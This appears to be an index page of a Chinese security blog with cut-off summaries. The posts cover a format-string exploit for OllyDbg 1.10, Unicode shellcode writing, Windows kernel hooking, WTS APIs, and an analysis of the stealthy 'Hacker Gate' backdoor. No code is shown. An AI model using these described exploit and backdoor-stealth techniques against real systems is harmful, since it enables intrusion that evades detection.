OD作为一款Ring3下的调试器以优异的性能博得了广大密界爱好者的一致肯定,就在最近milw0rm上公布了一个OD 0 day的POC(OllyDbg v110 Local Format String Exploit),以前写了很多栈溢出的漏洞,却很少有Format String的漏洞,这次OD给我们提供了一个熟悉Format String问题的机会(只有原版的OD存在此问题,看雪论坛的修改版OllyIce不存在此问题)。
........ 阅读全文
摘要:
对于溢出爱好者来说,能够编写Shellcode是一个必备的基本技能,特别是能应对各种在实际情况中对Shellcode存在各种限制条件的时候,这种能力就显得尤为重要了。黑防2007年第二期中介绍了纯字母数字的Shellcode的编写,在3期中的WinRAR 7z溢出中就派上了用场。Unicode大家应该不陌生,在一些大型程序中,比如Word、Excel考虑到不同语言平台的差异性,都会使用 Unicode,在利用这些漏洞的时候,我们以往的Shellcode就难以适用了。一个普通的Down&Exec的Shellcode经过 MultiByteToWideChar函数转换成Unicode后
..........
阅读全文
摘要:
每个进程都有它自己的私有地址空间。当使用指针来引用内存时,指针的值将引用你自己进程的地址空间中的一个内存地址,有些情况下,必须打破进程的界限,访问另一个进程的地址空间,这些情况包括:
...........
阅读全文
摘要:
介绍通用Hook的一点思想:
在系统内核级中,MS的很多信息都没公开,包括函数的参数数目,每个参数的类型等。在系统内核中,访问了大量的寄存器,而很多寄存器的值,是上层调用者提供的。如果值改变系统就会变得不稳定。很可能出现不可想象的后果。另外有时候对需要Hook的函数的参数不了解,所以不能随便就去改变它的堆栈,如果不小心也有可能导致蓝屏。所以Hook的最佳原则是在自己的Hook函数中呼叫原函数的时候,所有的寄存器值,堆栈里面的值和Hook前的信息一样。这样就能保证在原函数中不会出错。一般我们自己的Hook的函数都是写在C文件里面的。例如Hook的目标函数KiReadyThread。
........
阅读全文
摘要: 性情中人,啥都不说了
......
阅读全文
摘要:
日K线
阅读全文
摘要:
WTS APIs(Windows终端服务API)获取进程信息
Windows XP 有一个新特性叫做“快速用户转换——Fast User Switching”,这个特性允许多个用户同时在一台机器上登陆。当一个用户登陆后,另一个用户启动的进程仍然能够运行。这个神奇的特性所倚仗的是 WTS APIs。如果你想了解更多有关 WTS 的内容,可以参考 MSJ Oct99 的一篇文章:“Windows NT和 Windows 2000 终端服务APIs介绍”,作者是 Frank Kim。
Windows XP为每一个登陆用户创建一个WTS会话(Session)。每个运行进程总是与这样一个Session关联。Windows XP的任务管理器允许你列出进程清单,不论是针对所有会话的还是仅仅针对自己的会话,任务管理器对话框的进程标签中有一个"显示所有用户的进程"复选框可以对此进行选择。
................. 阅读全文
摘要: “黑客之门”介绍
黑客之门采用的目前一些先进的后门技术,它只有一个Dll文件,通过感染系统文件启动自身,被感染的系统文件大小和日期都不会改变;同时采用线程插入技术,本身没有进程;本身不开端口,而是重用系统进程开的任意一个端口,如80,135,139,445等,因此它的隐藏性非常好,而且穿透防火墙也是很容易的事。这个版本文件不大,只提供一些很有用的命令。目前还没有发现如何工具能查到这个后门,象Fport,Llister,RKDetector等查工具都失效。
程序的自启动
既然是一个后门,那么就要随系统的启动而启动,根据黑客之门的介绍,它是通过感染系统程序文件来实现程序的自启动的。既然是感染了系统文件(像病毒),那就看看感染前和感染后的系统文件的区别吧!为了测试感染前后的差别,我准备了一个专门用来被感染的文件TestLoad.exe,它没有什么功能,只是弹出一个对话框,这样好等待测试,麻雀虽小,五脏俱全,省得动系统文件了。接着运行命令:
................... 阅读全文
|
|
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
---|
24 | 25 | 26 | 27 | 28 | 29 | 30 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 1 | 2 | 3 | 4 |
|
公告
常用链接
留言簿(113)
随笔分类
随笔档案
文章分类
相册
Link
搜索
最新评论
阅读排行榜
评论排行榜
|
|